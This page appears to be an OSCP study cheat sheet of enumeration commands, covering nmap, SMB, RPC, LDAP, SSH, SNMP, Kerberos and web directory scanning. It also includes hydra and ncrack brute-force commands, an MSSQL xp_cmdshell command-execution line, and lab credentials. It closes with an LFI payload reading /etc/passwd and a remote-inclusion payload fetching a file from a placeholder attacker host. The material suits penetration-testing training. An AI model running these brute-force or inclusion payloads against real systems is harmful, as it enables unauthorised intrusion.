Enumeration (정보 수집 및 열거)

All you need to know about basic host-based enumeration for OSCP

Network Discovery

Common Nmap Scan

nmap -sV -sT -sC -T5 -v -A $targetip

-sV (Version detection)
-sT (TCP connect scan)
-sC (Performs a script scan using the default set of scripts)
-T5 (Insane mode)
-v (Increase verbosity level)
-A (OS Detection)

All TCP port scan

nmap -p- -sT -v $targetip

All UDP Port Scan (With Service and Script Scan)

nmap -p- -sV -sU -sC $targetip

100 most common ports

nmap $targetip -F 100

Nmap Script Scan

Find the nse scripts

locate *.nse | grep <script.nse>

For example, the below command will find smb scripts.

locate *.nse | grep smb

Scan using a specific NSE script

nmap -sV -p 443 --script=ssl-heartbleed.nse $targetip

For example, below command will find any smb scripts running on port 139 & 445.

nmap -p 139,445 --script=smb-* $targetip

All smb scripts:

nmap --script smb-vuln* -p 139,445 [ip]

SMB share paths enumeration:

nmap --script smb-enum-shares -p 139,445 [ip]

Using Metasploit portscan

use auxiliary/scanner/portscan/

Service Discovery

Port 80 & 443 - Web Discovery

Find SSL Heartbleed Vulnerablity

sslscan $targetip:443

nmap -sV --script=ssl-heartbleed 192.168.101.8

Scan Web Servers

Nikto -h $targethost -p $targetport

Dictionary Attacks for finding hidden web objects

gobuster dir –url http://$targetip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx,php

You can also use the common web_content list.

/usr/share/seclists/Discovery/Web_Content/common.txt

For cgi-bin,

gobuster dir –url http://$targetip/cgi-bin/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -x aspx,php

Or for faster scan

ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -u 
http://$targetIP/FUZZ/something

ffuf Github link: https://github.com/ffuf/ffuf

Port 445 - SMB Discovery

To discover “All” of SMB

enum4linux -a $targetip

To discover the userlist

enum4linux -U $targetip

You can create a username list with awk.

cat user.txt | awk -F'[][]' '{print $2}' >> users.txt

enum4linux -s file

To find Password Policy

enum4linux -p $targetip

Alternative samba enumeration using smbmap

smbmap -H $targetip -d $domain -R

You can download file by smbmap directly from the victim host

smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 --download "Users\SVC_TGS\Desktop\user.txt"

SMBCLIENT copying whole directory

mount -t cifs //IPADDESS/SHARE /mnt -o "user=SMBUSER,password=SMBPASS"

Check the list of shares via SMB null session

smbclient –list //$targetip/ -U ‘’ -N

smbclient \\$targetip\\$share

smbclient to list out share paths with sambaNTPasswrod

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //ypuffy.htb/

Useful SMB commands

get $file to extract file to your host.
put $file to inject file to the victim.

Port 135 - RPC Discovery

rpcclient -U "" $targetip

Then use the below commands for more information

srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

rpcbind -p 192.168.1.101

Port 389 & 636 for SSL - LDAP Discovery

ldapsearch -h 192.168.1.101 -p 389 -x -b "dc=mywebsite,dc=com"

or using nmap

nmap -p 389 --script ldap-search ypuffy.htb

Port 21 - FTP Discovery

ftp $targetip
nc $targetip 21

FTP Commands List: https://www.serv-u.com/features/file-transfer-protocol-server-linux/commands

Port 3306 - MySQL

mysql --host=$targetip -u root -p

telnet 192.168.0.101 3306

ERROR 1130 (HY000): Host '192.168.0.101' is not allowed to connect to this MySQL server means only localhost can log in as root.

MYSQL Commands List : http://cse.unl.edu/~sscott/ShowFiles/SQL/CheatSheet/SQLCheatSheet.html

SQL Password Storage

You can check the web server configuration php file if it contains any credentials.

/var/www/html/configuration.php

Port 3389 - RDP

RDP to Windows

rdesktop -u $username -p $password <IP>

Ruby winrm package from

GitHub - WinRb/WinRM: Ruby library for Windows Remote ManagementGitHub

gem install -r winrm
ruby winrm_shell.rb

Bruteforce RDP

ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.101

Port 21 - FTP

ftp $targetip

nc $targetip 21

Port 22 - SSH

Information Gathering using nc

nc -nv  10.11.1.71 22

The target OS is "Ubuntu", using "OpenSSH v6.6" (and package is 2ubuntu2)

ssh -i id_rsa [email protected]

ssh-gen

/usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root .ssh/id_rsa

Bruteforce SSH Credential with hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip ssh -t 5

Port 161 UDP - SNMP

snmpwalk -c public -v 1 10.10.10.116

To check if snmp port is opened

nc -nv -u -z -w 1 10.11.1.73 160-162

Port 88 - Kerberos

Bruteforce the username list with nmap script.

nmap -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='HTB',userdb=/root/oscp/forest/users.txt 10.10.10.161

Port 1433 -SQL

Command Injection using nmap

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=poiuytrewq,mssql.database=bankdb,ms-sql-xp-cmdshell.cmd="whoami" 10.11.1.31

Telnet - 25

telnet $targetip 25

Finding known exploits from Exploit-DB

To update to latest Exploit-DB

searchsploit -u

To find a exploit

searchsploit $item

To copy the file to your current directory.

searchsploit -m $item

To find item wihtout DOS attack

searchsploit apache 2.x | grep -v '/dos/'

Local File inclusions

Simple test if the target is vulnerable to LFI

http://target.com/?page=./../../../../../../../../../etc/passwd%00

Simple test if you can run a local script against the target

http://target.com/?page=http://hackerip/evil.txt%00

PreviousHost-based 공격 CheatSheet (FEAT. OSCP)NextExploitation (공격)

Last updated 2 years ago

hashtagNetwork Discovery

hashtagCommon Nmap Scan

hashtagAll TCP port scan

hashtagAll UDP Port Scan (With Service and Script Scan)

hashtag100 most common ports

hashtagNmap Script Scan

hashtagFind the nse scripts

hashtagScan using a specific NSE script

hashtagService Discovery

hashtagPort 80 & 443 - Web Discovery

hashtagFind SSL Heartbleed Vulnerablity

hashtagScan Web Servers

hashtagDictionary Attacks for finding hidden web objects

hashtagPort 445 - SMB Discovery

hashtagTo discover “All” of SMB

hashtagTo discover the userlist

hashtagBruteforce the share names

hashtagTo find Password Policy

hashtagAlternative samba enumeration using smbmap

hashtagSMBCLIENT copying whole directory

hashtagCheck the list of shares via SMB null session

hashtagConnect to a spefic share path you found

hashtagPort 135 - RPC Discovery

hashtagPort 389 & 636 for SSL - LDAP Discovery

hashtagPort 21 - FTP Discovery

hashtagPort 3306 - MySQL

hashtagSQL Password Storage

hashtagPort 3389 - RDP

hashtagPort 21 - FTP

hashtagPort 22 - SSH

hashtagPort 161 UDP - SNMP

hashtagPort 88 - Kerberos

hashtagPort 1433 -SQL

hashtagTelnet - 25

hashtagFinding known exploits from Exploit-DB

hashtagLocal File inclusions